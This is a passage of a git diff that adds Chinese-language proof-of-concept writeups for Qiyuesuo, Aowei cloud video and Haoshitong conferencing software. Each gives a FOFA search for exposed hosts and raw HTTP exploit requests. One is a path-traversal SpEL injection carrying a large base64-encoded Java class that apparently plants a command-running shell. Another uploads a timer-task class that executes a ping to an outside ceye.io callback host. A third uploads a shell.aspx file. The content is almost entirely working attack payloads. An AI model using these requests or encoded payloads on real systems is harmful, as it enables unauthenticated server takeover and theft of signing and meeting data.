VFBbEFLSUFKZ0RLQUNjQTFnQW9BTndBS1FEbEFDb0EvZ0FyQVFFQUxnRWFBRE1CSFFBdkFSOEFNQUVyQURFQk1RQXlBVG9BTlFGREFEWUJTUUEzQVZVQU9BRmZBRG9CYkFBN0FYVUFQQUY2QUQwQmt3QStBYVlBUHdHdkFFQUJ0UUJCQWI0QVFnSGtBRU1DQUFCRkFpY0FTQUppQUVrQ2ZnQktBcEVBU3dLL0FFd0N3Z0JOQXNVQU9nTExBRklDMEFCVEF0TUFJZ0xaQUcwQzNBQnhBdDhBYmdMZ0FHOEM1QUJ3QXVjQWN3QlVBQUFCYWdBa0FCb0FCUUJaQUZvQUF3RXJBQThBV3dCY0FCTUJId0FiQUYwQVhnQVNBYThCRmdCZkFGd0FHQUcrQVFjQVlBQmhBQmtCNUFEaEFHSUFZUUFhQWdBQXhRQmpBR0VBR3dJbkFKNEFaQUJsQUJ3Q1lnQmpBR1lBWndBZEFuNEFSd0JvQUdVQUhnS1JBRFFBYVFCbEFCOEJrd0V5QUdvQVpRQVhBWFVCVUFCckFHRUFGZ0ZpQVdrQVdRQnNBQlVBMWdIOUFHMEFYQUFPQU9VQjdnQnVBR0VBRHdEK0FkVUFid0JoQUJBQkFRSFNBSEFBWVFBUkFVTUJrQUJ4QUZ3QUVnRlZBWDRBY2dCekFCTUJYd0YwQUYwQWN3QVVBS0lDTVFCMEFHRUFEUUNIQWt3QWRRQjJBQXdBZUFKaEFIY0FiQUFMQUFjQzFRQjRBSFlBQVFBUEFzMEFlUUI2QUFJQUpnSzJBSHNBZkFBREFDNENyZ0I5QUh3QUJBQTJBcVlBZmdCOEFBVUFQZ0tlQUg4QWZBQUdBRWNDbFFDQUFGd0FCd0JWQW9jQWdRQmNBQWdBY2dKcUFJSUFnd0FKQUhVQ1p3Q0VBSVVBQ2dMZ0FBY0Fld0NHQUFFQUF3TG1BSWNBWlFBQUFJZ0FBQUdYQUE3L0FCa0FBd2NBaVFjQWlnY0Fpd0FCQndDTUJmOEFXQUFNQndDSkJ3Q0tCd0NMQndDTkJ3Q05Cd0NOQndDTkJ3Q09Cd0NPQndBU0FRRUFBUDhBcEFBU0J3Q0pCd0NLQndDTEJ3Q05Cd0NOQndDTkJ3Q05Cd0NPQndDT0J3QVNBUUVIQUlvSEFJOEhBSTRIQUk4SEFJOEhBSThBQVFjQWtCei9BQ2NBRmdjQWlRY0FpZ2NBaXdjQWpRY0FqUWNBalFjQWpRY0FqZ2NBamdjQUVnRUJCd0NLQndDUEJ3Q09Cd0NQQndDUEJ3Q1BCd0NPQndDUkJ3Q1JBUUFBL3dEcUFCMEhBSWtIQUlvSEFJc0hBSTBIQUkwSEFJMEhBSTBIQUk0SEFJNEhBQklCQVFjQWlnY0Fqd2NBamdjQWp3Y0Fqd2NBandjQWpnY0FrUWNBa1FFSEFJOEhBSWtIQUk0SEFJOEhBSThIQUk4SEFJa0FBRklIQUpML0FHUUFGZ2NBaVFjQWlnY0Fpd2NBalFjQWpRY0FqUWNBalFjQWpnY0FqZ2NBRWdFQkJ3Q0tCd0NQQndDT0J3Q1BCd0NQQndDUEJ3Q09Cd0NSQndDUkFRQUErZ0FGL3dBSEFBd0hBSWtIQUlvSEFJc0hBSTBIQUkwSEFJMEhBSTBIQUk0SEFJNEhBQklCQVFBQStnQUYvd0FGQUFFSEFJa0FBUWNBa3djQUFRQ1VBQUFBQWdDViIpLG5ldyBqYXZheC5tYW5hZ2VtZW50LmxvYWRpbmcuTUxldChuZXcgamF2YS5uZXQuVVJMWzBdLFQgKGphdmEubGFuZy5UaHJlYWQpLmN1cnJlbnRUaHJlYWQoKS5nZXRDb250ZXh0Q2xhc3NMb2FkZXIoKSkpLmRvSW5qZWN0KCk=';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-8');var c=a.parseExpression(deStr);c.getValue();"}]}
+```
+
+![1722948921012-d7362972-6b24-4b17-b505-2f6802c653dc.png](./img/2GBNUvKibEDYzpYA/1722948921012-d7362972-6b24-4b17-b505-2f6802c653dc-436260.png)
+
+
+
+> 更新: 2024-09-13 14:39:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nhbgwpl2wbtzxq7z>
\ No newline at end of file
diff --git a/契约锁template存在远程命令执行漏洞.md b/契约锁template存在远程命令执行漏洞.md
new file mode 100644
index 0000000..5c323d3
--- /dev/null
+++ b/契约锁template存在远程命令执行漏洞.md
@@ -0,0 +1,32 @@
+# 契约锁template存在远程命令执行漏洞
+
+# 一、漏洞简介
+Qiyuesuo是一款数字化可信基础服务平台，为组织提供“数字身份、电子签章、印章管控以及数据存证服务”于一体的数字化可信基础解决方案。Qiyuesuo存在前台代码执行漏洞，攻击者可构造恶意请求绕过相关认证调用后台功能造成远程代码执行，控制服务器。
+
+# 二、影响版本
++ 契约锁
+
+# 三、资产测绘
++ fofa`app="契约锁-电子签署平台"`
++ 特征
+
+![1717569204388-1722148f-4f83-4ad5-83a5-33896b546916.png](./img/hnHfwvjyibiVjOX0/1717569204388-1722148f-4f83-4ad5-83a5-33896b546916-245916.png)
+
+# 四、漏洞复现
+```http
+POST /login/%2e%2e/template/html/add HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Type: application/json
+X-State: id
+Content-Length: 9839
+
+{"file": "1", "title": "2", "params": [{"extensionParam": "{\"expression\":\"var a=new org.springframework.expression.spel.standard.SpelExpressionParser();var b='VCAob3JnLnNwcmluZ2ZyYW1ld29yay5jZ2xpYi5jb3JlLlJlZmxlY3RVdGlscykuZGVmaW5lQ2xhc3MoIlF5c1Rlc3QiLFQgKG9yZy5zcHJpbmdmcmFtZXdvcmsudXRpbC5CYXNlNjRVdGlscykuIGRlY29kZUZyb21TdHJpbmcoInl2NjZ2Z0FBQURJQktBb0FJUUNXQ0FDWENnQ1lBSmtLQUpnQW1nb0Ftd0NjQ0FDZENnQ2JBSjRIQUo4SUFLQUlBS0VJQUtJSUFLTUtBQjhBcEFvQXBRQ21DQUNuQ2dDWUFLZ0tBS1VBcVFjQWd3b0FtQUNxQ0FDckNnQXNBS3dLQUNFQXJRb0FId0NxQ0FDdUNnQWZBSzhLQUxBQXFnZ0FzUW9BTEFDeUNBQ3pDQUMwQndDMUNnQWZBTFlIQUxjS0FMZ0F1UWdBdWdjQXV3Z0F2QWdBdlFjQXZnb0FKd0MvQ2dBbkFNQUtBQ2NBd1FnQXdnY0F3d2dBeEFnQXhRa0F4Z0RIQ2dER0FNZ0lBTWtIQU1vSUFNc0lBTXdJQU0wS0FNNEF6d29BTEFEUUNBRFJDQURTQ0FEVENBRFVDQURWQndEV0NnRFhBTmdLQU5jQTJRb0EyZ0RiQ2dBOUFOd0lBTjBLQUQwQTNnb0FQUURmQndEZ0NnQkZBSllJQU9FS0FDd0E0Z29BUlFEakNBRGtDQURsQndEbUNnQk1BT2NJQU9nSEFPa0JBQVk4YVc1cGRENEJBQU1vS1ZZQkFBUkRiMlJsQVFBUFRHbHVaVTUxYldKbGNsUmhZbXhsQVFBU1RHOWpZV3hXWVhKcFlXSnNaVlJoWW14bEFRQUVkR2hwY3dFQUNVeFJlWE5VWlhOME93RUFDR1J2U1c1cVpXTjBBUUFVS0NsTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBVjJZWEl5T0FFQUlreHFZWFpoTDJ4aGJtY3ZRMnhoYzNOT2IzUkdiM1Z1WkVWNFkyVndkR2x2YmpzQkFBVjJZWEl5TmdFQUdVeHFZWFpoTDJ4aGJtY3ZjbVZtYkdWamRDOUdhV1ZzWkRzQkFBVjJZWEl5TndFQUlVeHFZWFpoTDJ4aGJtY3ZUbTlUZFdOb1RXVjBhRzlrUlhoalpYQjBhVzl1T3dFQUJYWmhjak14QVFBRmRtRnlNeklCQUJKTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzQkFBVjJZWEl6TXdFQUJYSmxjRzl1QVFBRGMzUnlBUUFTVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3QVFBRVkyMWtjd0VBRTF0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBbHlaWE4xYkhSVGRISUJBQVpsYm1OdlpHVUJBQVYyWVhJek1BRUFCWFpoY2pJNUFRQUJTUUVBQlhaaGNqSXhBUUFGZG1GeU1qSUJBQVYyWVhJeU13RUFCWFpoY2pJMEFRQUZkbUZ5TWpVQkFBVjJZWEkzT0FFQUZVeHFZWFpoTDNWMGFXd3ZRWEp5WVhsTWFYTjBPd0VBQlhaaGNqSXdBUUFGZG1GeU1Ua0JBQkpNYW1GMllTOXNZVzVuTDFSb2NtVmhaRHNCQUFWMllYSXhPQUVBQkhaaGNqZ0JBQVIyWVhJNUFRQVhUR3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2pzQkFBVjJZWEl4TUFFQUVVeHFZWFpoTDJ4aGJtY3ZRMnhoYzNNN0FRQUZkbUZ5TVRFQkFBVjJZWEl4TWdFQUJYWmhjakV6QVFBRmRtRnlNVFFCQUFWMllYSXhOUUVBQlhaaGNqRTJBUUFUVzB4cVlYWmhMMnhoYm1jdlZHaHlaV0ZrT3dFQUJYWmhjakUzQVFBQldnRUFGVXhxWVhaaEwyeGhibWN2UlhoalpYQjBhVzl1T3dFQUEyMXpad0VBRFZOMFlXTnJUV0Z3VkdGaWJHVUhBTU1IQU9vSEFPc0hBSjhIQUxVSEFPd0hBTGNIQUxzSEFMNEhBR2NIQU9ZQkFBcFRiM1Z5WTJWR2FXeGxBUUFNVVhselZHVnpkQzVxWVhaaERBQlFBRkVCQUFWemRHRnlkQWNBNmd3QTdRRHVEQUR2QVBBSEFPc01BUEVBOEFFQUhXOXlaeTVoY0dGamFHVXVZMjk1YjNSbExsSmxjWFZsYzNSSmJtWnZEQUR5QVBNQkFDQnFZWFpoTDJ4aGJtY3ZRMnhoYzNOT2IzUkdiM1Z1WkVWNFkyVndkR2x2YmdFQUVHcGhkbUV1YkdGdVp5NVVhSEpsWVdRQkFCVnFZWFpoTG14aGJtY3VWR2h5WldGa1IzSnZkWEFCQUNKdmNtY3VZWEJoWTJobExtTnZlVzkwWlM1U1pYRjFaWE4wUjNKdmRYQkpibVp2QVFBSGRHaHlaV0ZrY3d3QTlBRDFCd0RzREFEMkFQY0JBQVowWVhKblpYUU1BUGdBK1F3QStnRDdEQUQ4QUZnQkFBUm9kSFJ3REFEOUFQNE1BUDhCQUFFQUNVVnVaSEJ2YVc1MEpBd0JBUUVDQndFREFRQWFiM0puTG1Gd1lXTm9aUzUwYjIxallYUXVkWFJwYkM1dVpYUU1BUVFCQlFFQUJuUm9hWE1rTUFFQUNtZGxkRWhoYm1Sc1pYSUJBQTlxWVhaaEwyeGhibWN2UTJ4aGMzTU1BUVlCQndFQUVHcGhkbUV2YkdGdVp5OVBZbXBsWTNRSEFRZ01BUWtCQ2dFQUNXZGxkRWRzYjJKaGJBRUFIMnBoZG1FdmJHRnVaeTlPYjFOMVkyaE5aWFJvYjJSRmVHTmxjSFJwYjI0QkFBWm5iRzlpWVd3QkFBcHdjbTlqWlhOemIzSnpBUUFUYW1GMllTOTFkR2xzTDBGeWNtRjVUR2x6ZEF3QkN3RU1EQUVOQVE0TUFQb0JEd0VBRTJkbGRGZHZjbXRsY2xSb2NtVmhaRTVoYldVQkFCQnFZWFpoTDJ4aGJtY3ZVM1J5YVc1bkFRQURjbVZ4QVFBSFoyVjBUbTkwWlFjQkVBd0JFUUI4REFFU0FSTUJBQXRuWlhSU1pYTndiMjV6WlFFQUVsdE1hbUYyWVM5c1lXNW5MME5zWVhOek93RUFDV2RsZEVobFlXUmxjZ0VBQjFndFUzUmhkR1VCQUFkdmN5NXVZVzFsQndFVURBRVZBUllNQVJjQVdBRUFCbmRwYm1SdmR3RUFCMk50WkM1bGVHVUJBQUl2WXdFQUJ5OWlhVzR2YzJnQkFBSXRZd0VBRVdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5QndFWURBRVpBUm9NQVJzQkhBY0JIUXdCSGdFZkRBQlFBU0FCQUFKY1FRd0JJUUVpREFFakFGZ0JBQlp6ZFc0dmJXbHpZeTlDUVZORk5qUkZibU52WkdWeUFRQUZWVlJHTFRnTUFTUUJKUXdBYVFFbUFRQUpZV1JrU0dWaFpHVnlBUUFIYzNWalkyVnpjd0VBRTJwaGRtRXZiR0Z1Wnk5RmVHTmxjSFJwYjI0TUFTY0FVUUVBQldWeWNtOXlBUUFIVVhselZHVnpkQUVBRUdwaGRtRXZiR0Z1Wnk5VWFISmxZV1FCQUJWcVlYWmhMMnhoYm1jdlEyeGhjM05NYjJGa1pYSUJBQmRxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlHYVdWc1pBRUFEV04xY25KbGJuUlVhSEpsWVdRQkFCUW9LVXhxWVhaaEwyeGhibWN2VkdoeVpXRmtPd0VBRldkbGRFTnZiblJsZUhSRGJHRnpjMHh2WVdSbGNnRUFHU2dwVEdwaGRtRXZiR0Z1Wnk5RGJHRnpjMHh2WVdSbGNqc0JBQWxuWlhSUVlYSmxiblFCQUFsc2IyRmtRMnhoYzNNQkFDVW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFRWjJWMFJHVmpiR0Z5WldSR2FXVnNaQUVBTFNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrT3dFQURYTmxkRUZqWTJWemMybGliR1VCQUFRb1dpbFdBUUFPWjJWMFZHaHlaV0ZrUjNKdmRYQUJBQmtvS1V4cVlYWmhMMnhoYm1jdlZHaHlaV0ZrUjNKdmRYQTdBUUFEWjJWMEFRQW1LRXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPeWxNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNCQUFkblpYUk9ZVzFsQVFBSVkyOXVkR0ZwYm5NQkFCc29UR3BoZG1FdmJHRnVaeTlEYUdGeVUyVnhkV1Z1WTJVN0tWb0JBQWhuWlhSRGJHRnpjd0VBRXlncFRHcGhkbUV2YkdGdVp5OURiR0Z6Y3pzQkFBcG5aWFJRWVdOcllXZGxBUUFWS0NsTWFtRjJZUzlzWVc1bkwxQmhZMnRoWjJVN0FRQVJhbUYyWVM5c1lXNW5MMUJoWTJ0aFoyVUJBQVpsY1hWaGJITUJBQlVvVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3S1ZvQkFBbG5aWFJOWlhSb2IyUUJBRUFvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3VzB4cVlYWmhMMnhoYm1jdlEyeGhjM003S1V4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5TlpYUm9iMlE3QVFBWWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrQVFBR2FXNTJiMnRsQVFBNUtFeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME8xdE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdBUUFGWTJ4dmJtVUJBQlFvS1V4cVlYWmhMMnhoYm1jdlQySnFaV04wT3dFQUJITnBlbVVCQUFNb0tVa0JBQlVvU1NsTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzQkFCRnFZWFpoTDJ4aGJtY3ZTVzUwWldkbGNnRUFCRlJaVUVVQkFBZDJZV3gxWlU5bUFRQVdLRWtwVEdwaGRtRXZiR0Z1Wnk5SmJuUmxaMlZ5T3dFQUVHcGhkbUV2YkdGdVp5OVRlWE4wWlcwQkFBdG5aWFJRY205d1pYSjBlUUVBSmloTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQUxkRzlNYjNkbGNrTmhjMlVCQUJGcVlYWmhMMnhoYm1jdlVuVnVkR2x0WlFFQUNtZGxkRkoxYm5ScGJXVUJBQlVvS1V4cVlYWmhMMnhoYm1jdlVuVnVkR2x0WlRzQkFBUmxlR1ZqQVFBb0tGdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlRY205alpYTnpPd0VBRVdwaGRtRXZiR0Z1Wnk5UWNtOWpaWE56QVFBT1oyVjBTVzV3ZFhSVGRISmxZVzBCQUJjb0tVeHFZWFpoTDJsdkwwbHVjSFYwVTNSeVpXRnRPd0VBR0NoTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc3BWZ0VBREhWelpVUmxiR2x0YVhSbGNnRUFKeWhNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5T3dFQUJHNWxlSFFCQUFoblpYUkNlWFJsY3dFQUZpaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BXMElCQUJZb1cwSXBUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFQY0hKcGJuUlRkR0ZqYTFSeVlXTmxBQ0VBVHdBaEFBQUFBQUFDQUFFQVVBQlJBQUVBVWdBQUFDOEFBUUFCQUFBQUJTcTNBQUd4QUFBQUFnQlRBQUFBQmdBQkFBQUFDUUJVQUFBQURBQUJBQUFBQlFCVkFGWUFBQUFKQUZjQVdBQUJBRklBQUFjaUFBWUFJQUFBQXVrU0FrdTRBQU5NSzdZQUJMWUFCVTBzRWdhMkFBZFhwd0FKVGl1MkFBUk5MQklKdGdBSFRpd1NDcllBQnpvRUxCSUd0Z0FIT2dVc0VndTJBQWM2QmhrRUVneTJBQTA2QnhrSEJMWUFEaTBTRDdZQURUb0lHUWdFdGdBT0dRY3J0Z0FRdGdBUndBQVN3QUFTd0FBU3dBQVNPZ2tETmdvRE5nc1ZDeGtKdnFJQ1hCa0pGUXN5T2d3WkRNWUNTaGtNdGdBVEVoUzJBQldaQWowWkNCa010Z0FST2cwWkRjWUNMeGtOdGdBV3RnQVhFaGkyQUJXWkFoOFpEYllBRnJZQUdiWUFHaElidGdBY21RSU1HUTIyQUJZU0hiWUFEVG9PR1E0RXRnQU9HUTRaRGJZQUVUb1BHUSsyQUJZU0hnTzlBQisyQUNBWkR3TzlBQ0cyQUNJNkVBRTZFUmtRdGdBV0VpTUR2UUFmdGdBZ0dSQUR2UUFodGdBaU9oR25BQ0E2RWhrUXRnQVdFaVcyQUEwNkV4a1RCTFlBRGhrVEdSQzJBQkU2RVJrR0VpYTJBQTA2RWhrU0JMWUFEaGtTR1JHMkFCSEFBQ2M2RXhrVHRnQW93QUFuT2hRRE5oVVZGUmtVdGdBcG9nRmlHUlFWRmJZQUtqb1dHUmJHQVU0WkJSSXJBNzBBSDdZQUlCa1dBNzBBSWJZQUlzQUFMRG9YR1JmR0FUQVpGN2dBQTdZQUU3WUFISmtCSWhrRkVpMjJBQTA2R0JrWUJMWUFEaGtZR1JhMkFCRTZHUmtadGdBV0VpNEV2UUFmV1FPeUFDOVR0Z0FnR1JrRXZRQWhXUU1FdUFBd1U3WUFJam9hR1JxMkFCWVNNUU85QUIvQUFESzJBQ0FaR2dPOUFDRzJBQ0k2R3hrWnRnQVdFak1FdlFBZldRTVRBQ3hUdGdBZ0dSa0V2UUFoV1FNU05GTzJBQ0xBQUN3NkhCSTF1QUEydGdBM0VqaTJBQldaQUJrR3ZRQXNXUU1TT1ZOWkJCSTZVMWtGR1J4VHB3QVdCcjBBTEZrREVqdFRXUVFTUEZOWkJSa2NVem9kdXdBOVdiZ0FQaGtkdGdBL3RnQkF0d0JCRWtLMkFFTzJBRVE2SHJzQVJWbTNBRVlaSGhKSHRnQkl0Z0JKT2g4Wkc3WUFGaEpLQmIwQUgxa0RFd0FzVTFrRUV3QXNVN1lBSUJrYkJiMEFJVmtERWpSVFdRUVpIbE8yQUNKWEJEWUtwd0FKaEJVQnAvNmFGUXFaQUFhbkFBbUVDd0duL2FJU1MwdW5BQXRNSzdZQVRSSk9TeXF3QUFNQUR3QVdBQmtBQ0FFQkFSb0JIUUFrQUFNQzNBTGZBRXdBQXdCVEFBQUJBZ0JBQUFBQUN3QURBQTRBQndBUEFBOEFFZ0FXQUJVQUdRQVRBQm9BRkFBZkFCY0FKZ0FZQUM0QUdRQTJBQm9BUGdBYkFFY0FIQUJOQUIwQVZRQWVBRnNBSHdCeUFDQUFkUUFpQUlBQUl3Q0hBQ1FBbVFBbEFLSUFKZ0RLQUNjQTFnQW9BTndBS1FEbEFDb0EvZ0FyQVFFQUxnRWFBRE1CSFFBdkFSOEFNQUVyQURFQk1RQXlBVG9BTlFGREFEWUJTUUEzQVZVQU9BRmZBRG9CYkFBN0FYVUFQQUY2QUQwQmt3QStBYVlBUHdHdkFFQUJ0UUJCQWI0QVFnSGtBRU1DQUFCRkFpY0FTQUppQUVrQ2ZnQktBcEVBU3dLL0FFd0N3Z0JOQXNVQU9nTExBRklDMEFCVEF0TUFJZ0xaQUcwQzNBQnhBdDhBYmdMZ0FHOEM1QUJ3QXVjQWN3QlVBQUFCYWdBa0FCb0FCUUJaQUZvQUF3RXJBQThBV3dCY0FCTUJId0FiQUYwQVhnQVNBYThCRmdCZkFGd0FHQUcrQVFjQVlBQmhBQmtCNUFEaEFHSUFZUUFhQWdBQXhRQmpBR0VBR3dJbkFKNEFaQUJsQUJ3Q1lnQmpBR1lBWndBZEFuNEFSd0JvQUdVQUhnS1JBRFFBYVFCbEFCOEJrd0V5QUdvQVpRQVhBWFVCVUFCckFHRUFGZ0ZpQVdrQVdRQnNBQlVBMWdIOUFHMEFYQUFPQU9VQjdnQnVBR0VBRHdEK0FkVUFid0JoQUJBQkFRSFNBSEFBWVFBUkFVTUJrQUJ4QUZ3QUVnRlZBWDRBY2dCekFCTUJYd0YwQUYwQWN3QVVBS0lDTVFCMEFHRUFEUUNIQWt3QWRRQjJBQXdBZUFKaEFIY0FiQUFMQUFjQzFRQjRBSFlBQVFBUEFzMEFlUUI2QUFJQUpnSzJBSHNBZkFBREFDNENyZ0I5QUh3QUJBQTJBcVlBZmdCOEFBVUFQZ0tlQUg4QWZBQUdBRWNDbFFDQUFGd0FCd0JWQW9jQWdRQmNBQWdBY2dKcUFJSUFnd0FKQUhVQ1p3Q0VBSVVBQ2dMZ0FBY0Fld0NHQUFFQUF3TG1BSWNBWlFBQUFJZ0FBQUdYQUE3L0FCa0FBd2NBaVFjQWlnY0Fpd0FCQndDTUJmOEFXQUFNQndDSkJ3Q0tCd0NMQndDTkJ3Q05Cd0NOQndDTkJ3Q09Cd0NPQndBU0FRRUFBUDhBcEFBU0J3Q0pCd0NLQndDTEJ3Q05Cd0NOQndDTkJ3Q05Cd0NPQndDT0J3QVNBUUVIQUlvSEFJOEhBSTRIQUk4SEFJOEhBSThBQVFjQWtCei9BQ2NBRmdjQWlRY0FpZ2NBaXdjQWpRY0FqUWNBalFjQWpRY0FqZ2NBamdjQUVnRUJCd0NLQndDUEJ3Q09Cd0NQQndDUEJ3Q1BCd0NPQndDUkJ3Q1JBUUFBL3dEcUFCMEhBSWtIQUlvSEFJc0hBSTBIQUkwSEFJMEhBSTBIQUk0SEFJNEhBQklCQVFjQWlnY0Fqd2NBamdjQWp3Y0Fqd2NBandjQWpnY0FrUWNBa1FFSEFJOEhBSWtIQUk0SEFJOEhBSThIQUk4SEFJa0FBRklIQUpML0FHUUFGZ2NBaVFjQWlnY0Fpd2NBalFjQWpRY0FqUWNBalFjQWpnY0FqZ2NBRWdFQkJ3Q0tCd0NQQndDT0J3Q1BCd0NQQndDUEJ3Q09Cd0NSQndDUkFRQUErZ0FGL3dBSEFBd0hBSWtIQUlvSEFJc0hBSTBIQUkwSEFJMEhBSTBIQUk0SEFJNEhBQklCQVFBQStnQUYvd0FGQUFFSEFJa0FBUWNBa3djQUFRQ1VBQUFBQWdDViIpLG5ldyBqYXZheC5tYW5hZ2VtZW50LmxvYWRpbmcuTUxldChuZXcgamF2YS5uZXQuVVJMWzBdLFQgKGphdmEubGFuZy5UaHJlYWQpLmN1cnJlbnRUaHJlYWQoKS5nZXRDb250ZXh0Q2xhc3NMb2FkZXIoKSkpLmRvSW5qZWN0KCk=';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-8');var c=a['parseExpression'](deStr);c.getValue();\"}", "name": "3"}]}
+```
+
+![1717569277304-dc19df2a-f96e-430a-9212-e1516fb149ed.png](./img/hnHfwvjyibiVjOX0/1717569277304-dc19df2a-f96e-430a-9212-e1516fb149ed-540709.png)
+
+
+
+> 更新: 2024-06-17 09:34:03  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oul2pitgap61ihk3>
\ No newline at end of file
diff --git a/契约锁utask存在远程命令执行漏洞.md b/契约锁utask存在远程命令执行漏洞.md
new file mode 100644
index 0000000..8d2d8f5
--- /dev/null
+++ b/契约锁utask存在远程命令执行漏洞.md
@@ -0,0 +1,50 @@
+# 契约锁utask存在远程命令执行漏洞
+
+# 一、漏洞简介
+Qiyuesuo是一款数字化可信基础服务平台，为组织提供“数字身份、电子签章、印章管控以及数据存证服务”于一体的数字化可信基础解决方案。Qiyuesuo存在前台代码执行漏洞，攻击者可构造恶意请求绕过相关认证调用后台功能造成远程代码执行，控制服务器。
+
+# 二、影响版本
++ 契约锁
+
+# 三、资产测绘
++ fofa`app="契约锁-电子签署平台"`
++ 特征
+
+![1717569204388-1722148f-4f83-4ad5-83a5-33896b546916.png](./img/xMWHR1MX67p3_6_M/1717569204388-1722148f-4f83-4ad5-83a5-33896b546916-819995.png)
+
+# 四、漏洞复现
+```http
+POST /login/%2E%2E;/utask/upload HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Edg/106.0.1370.37
+Connection: close
+Content-Length: 498
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryco2lQ5vxCOn9Aq2R
+Accept-Encoding: gzip
+
+
+------WebKitFormBoundaryco2lQ5vxCOn9Aq2R
+Content-Disposition: form-data; name="type";
+
+TIMETASK
+------WebKitFormBoundaryco2lQ5vxCOn9Aq2R
+Content-Disposition: form-data; name="file";filename="qys.jpg"
+
+package qiyuesuo;
+
+import com.qiyuesuo.utask.java.BaseTimerTask;
+
+public class qiyuesuo004 extends BaseTimerTask {
+    static {try{Runtime.getRuntime().exec("ping grewuo.ceye.io");}catch (Exception e){}}
+}
+------WebKitFormBoundaryco2lQ5vxCOn9Aq2R--
+```
+
+![1717572143609-4985cd77-e1c6-41c2-a057-c8de47fb3934.png](./img/xMWHR1MX67p3_6_M/1717572143609-4985cd77-e1c6-41c2-a057-c8de47fb3934-647804.png)
+
+![1717572153338-675b3911-cdb4-46dd-87ce-7e9fa803db15.png](./img/xMWHR1MX67p3_6_M/1717572153338-675b3911-cdb4-46dd-87ce-7e9fa803db15-226554.png)
+
+
+
+> 更新: 2024-09-13 14:39:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cxxpice0g3tk68ed>
\ No newline at end of file
diff --git a/奥威亚云视频平台UploadFile.aspx存在文件上传漏洞.md b/奥威亚云视频平台UploadFile.aspx存在文件上传漏洞.md
new file mode 100644
index 0000000..dcce9da
--- /dev/null
+++ b/奥威亚云视频平台UploadFile.aspx存在文件上传漏洞.md
@@ -0,0 +1,36 @@
+# 奥威亚云视频平台UploadFile.aspx存在文件上传漏洞
+
+奥威亚云视频平台UploadFile.aspx存在文件上传漏洞，攻击者可上传webshell获取服务器权限。
+
+## fofa
+
+```yaml
+body="/Upload/DomainInfo/MaxAVALogo.png"
+```
+
+## poc
+
+```java
+POST /Services/WeikeCutOut/UploadFile.aspx?VideoGuid=/../../ HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data; boundary=----sajhdjqwjejqwbejhqwbjebqwhje
+
+------sajhdjqwjejqwbejhqwbjebqwhje
+Content-Disposition: form-data; name="file"; filename="shell.aspx."
+Content-Type: image/jpeg
+
+1111
+------sajhdjqwjejqwbejhqwbjebqwhje-
+```
+
+文件路径`http://ip/shell.aspx`
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/Kxmw41l8TK5jnaj63lyG0A
\ No newline at end of file
diff --git a/好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞.md b/好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞.md
new file mode 100644
index 0000000..d948836
--- /dev/null
+++ b/好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞.md
@@ -0,0 +1,27 @@
+# 好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞
+
+好视通云会议/fm/systemConfig/upLoad2.jsp接口处存在任意文件上传漏洞，未经身份认证的攻击者可以通过此漏洞上传恶意后门文件，最终可获取服务器权限。
+
+## fofa
+
+```javascript
+app:"好视通-云会议"
+```
+
+## poc
+
+```javascript
+POST /fm/systemConfig/upLoad2.jsp HTTP/1.1
+Content-Type: multipart/form-data; boundary=1515df1sdfdsfddfs
+Accept-Encoding: gzip
+ 
+--1515df1sdfdsfddfs
+Content-Disposition: form-data; name="file"; filename="dudesuite.jsp"
